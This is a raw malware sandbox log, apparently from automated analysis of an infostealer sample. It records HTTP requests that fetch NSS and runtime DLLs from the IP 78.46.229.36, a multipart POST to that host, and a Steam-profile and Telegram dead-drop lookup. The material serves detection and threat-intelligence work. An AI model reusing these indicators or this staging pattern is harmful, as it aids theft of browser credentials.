Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, RegAsm.exe, 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000004.00000002.2409373476.0000000019D5D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2405143294.0000000013DB1000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.4.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199658817715[1].htm.4.dr	String found in binary or memory: https://78.46.229.36
Source: RegAsm.exe, 00000004.00000002.2403578458.00000000013BA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/$
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/0
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/6
Source: RegAsm.exe, 00000004.00000002.2403578458.000000000149C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/Bi
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/D
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/F
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/Z0t
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/f
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/freebl3.dll
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/freebl3.dll6
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/mozglue.dll
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/mozglue.dllZ
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/msvcp140.dll
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/msvcp140.dllh
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/nd-point:
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/nss3.dll
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/ramData
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/s
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/softokn3.dll
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/softokn3.dllr
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/sqlm.dll
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/sqlm.dllf
Source: RegAsm.exe, 00000004.00000002.2403578458.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/te5
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/vcruntime140.dll
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36DBKJJ
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36HJEBK
Source: GCAFCAFH.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199658817715[1].htm.4.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: GCAFCAFH.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: GCAFCAFH.4.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: GCAFCAFH.4.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHl
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=GRA9
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=yp9unEzrjc_Z&amp
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=n5zImpoIZ8N
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?
Source: RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: GCAFCAFH.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GCAFCAFH.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GCAFCAFH.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199658817715
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001401000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/badges
Source: RegAsm.exe, 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/inventory/
Source: file.exe, 00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okRed
